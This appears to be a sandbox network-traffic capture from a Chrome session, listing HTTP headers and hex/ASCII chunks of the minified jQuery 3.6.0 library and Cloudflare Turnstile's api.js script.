                                                                                                        Connection: keep-alive
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        Accept: */*
                                                                                                        Sec-Fetch-Site: none
                                                                                                        Sec-Fetch-Mode: cors
                                                                                                        Sec-Fetch-Dest: empty
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-12-18 22:16:51 UTC613INHTTP/1.1 200 OK
                                                                                                        Connection: close
                                                                                                        Content-Length: 89501
                                                                                                        Server: nginx
                                                                                                        Content-Type: application/javascript; charset=utf-8
                                                                                                        Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                                        ETag: "28feccc0-15d9d"
                                                                                                        Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                                        Via: 1.1 varnish, 1.1 varnish
                                                                                                        Accept-Ranges: bytes
                                                                                                        Date: Wed, 18 Dec 2024 22:16:50 GMT
                                                                                                        Age: 3081742
                                                                                                        X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740046-EWR
                                                                                                        X-Cache: HIT, HIT
                                                                                                        X-Cache-Hits: 2774, 5
                                                                                                        X-Timer: S1734560211.890770,VS0,VE0
                                                                                                        Vary: Accept-Encoding
                                                                                                        2024-12-18 22:16:51 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                                        Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                                                        2024-12-18 22:16:51 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                                                                                        Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                                                                                                        2024-12-18 22:16:51 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                                                                                        Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                                                                                        2024-12-18 22:16:51 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                                                                                        Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                                                                                                        2024-12-18 22:16:51 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                                                                                                        Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                                                                                                        2024-12-18 22:16:51 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                                                                                                        Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
                                                                                                        2024-12-18 22:16:51 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                                                                                                        Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
                                                                                                        2024-12-18 22:16:51 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                                                                                                        Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                                                                                                        2024-12-18 22:16:51 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                                                                                                        Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
                                                                                                        2024-12-18 22:16:51 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                                                                                                        Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        11192.168.2.449756104.18.95.414432504C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 22:16:52 UTC383OUTGET /turnstile/v0/b/787bc399e22f/api.js HTTP/1.1
                                                                                                        Host: challenges.cloudflare.com
                                                                                                        Connection: keep-alive
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        Accept: */*
                                                                                                        Sec-Fetch-Site: none
                                                                                                        Sec-Fetch-Mode: cors
                                                                                                        Sec-Fetch-Dest: empty
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-12-18 22:16:52 UTC471INHTTP/1.1 200 OK
                                                                                                        Date: Wed, 18 Dec 2024 22:16:52 GMT
                                                                                                        Content-Type: application/javascript; charset=UTF-8
                                                                                                        Content-Length: 47692
                                                                                                        Connection: close
                                                                                                        accept-ranges: bytes
                                                                                                        last-modified: Tue, 10 Dec 2024 17:31:41 GMT
                                                                                                        cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                                                        access-control-allow-origin: *
                                                                                                        cross-origin-resource-policy: cross-origin
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8f4285120de743a9-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        2024-12-18 22:16:52 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 42 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                                                                        Data Ascii: "use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                                                                                        2024-12-18 22:16:52 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 53 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                                                                        Data Ascii: e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
                                                                                                        2024-12-18 22:16:52 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 6a 74 28 65 29 7c 7c 71 74 28 65 2c 72 29 7c 7c 47 74 28 65 2c 72 29 7c 7c 7a 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30
                                                                                                        Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return jt(e)||qt(e,r)||Gt(e,r)||zt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0
                                                                                                        2024-12-18 22:16:52 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 59 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 6a 3b 28 66 75
                                                                                                        Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Yt=300020;var De=300030;var Ve=300031;var j;(fu
                                                                                                        2024-12-18 22:16:52 UTC1369INData Raw: 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 4a 7c 7c 28 4a 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75
                                                                                                        Data Ascii: ="never",e.MANUAL="manual",e.AUTO="auto"})(J||(J={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(fu
                                                                                                        2024-12-18 22:16:52 UTC1369INData Raw: 65 3d 3d 3d 22 61 75 74 6f 22 7c 7c 4e 72 2e 74 65 73 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 67 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 61 6c 77 61 79 73 22 2c 22 65 78 65 63 75 74 65 22 2c 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 51 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 74 72 75 65 22 2c 22 66 61 6c 73 65 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 72 65 6e 64 65 72 22 2c 22 65 78 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 24 74 3d 33 30 30 2c 4a 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 68 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65
                                                                                                        Data Ascii: e==="auto"||Nr.test(e)}function gt(e){return M(["always","execute","interaction-only"],e)}function Qt(e){return M(["true","false"],e)}function yt(e){return M(["render","execute"],e)}var $t=300,Jt=10;function ht(e){var r=new URLSearchParams;if(e.params._de
                                                                                                        2024-12-18 22:16:52 UTC1369INData Raw: 2f 72 63 76 22 29 2e 63 6f 6e 63 61 74 28 6f 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 72 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 74 68 65 6d 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 45 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 73 69 7a 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 6c 61 6e 67 75 61 67 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 70 29 7d 76 61 72 20 52 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 2c 6e 2c 6f 3d 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53
                                                                                                        Data Ascii: /rcv").concat(o,"/").concat(e,"/").concat(r,"/").concat(n.theme,"/").concat(E,"/").concat(n.size,"/").concat(n.language,"/").concat(p)}var Rt=function(e){var r,n,o=window.innerWidth<400,c=e.state===Se.FAILURE_FEEDBACK||e.state===Se.FAILURE_HAVING_TROUBLES
